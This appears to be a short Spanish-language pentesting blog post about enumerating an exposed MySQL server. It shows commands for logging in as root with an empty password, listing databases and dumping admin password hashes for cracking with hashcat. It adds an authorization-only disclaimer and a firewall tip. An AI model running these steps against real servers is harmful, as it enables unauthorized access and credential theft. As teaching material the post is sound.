~ / blog / pentesting
KALI

Enumera MySQL

Si encuentras un MySQL expuesto en el puerto tres tres cero seis, prueba credenciales débiles o por defecto, como root sin contraseña.

Si entras, listas las bases de datos, y vas directo a la tabla de usuarios, donde suelen estar los hashes de contraseñas. Con esos hashes te vas a hashcat.

Una base de datos accesible desde afuera con credenciales flojas entrega toda la información de la aplicación. Ciérrala al firewall.

# los comandos

kali@kali:~$ mysql -h 10.0.0.5 -u root -pcopiar
Enter password: (vacío)
mysql>
mysql> show databases;copiar
tienda
usuarios
mysql
mysql> select user,password from usuarios.admin;copiar
admin | 5f4dcc3b5aa765d61d8327deb882cf99
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.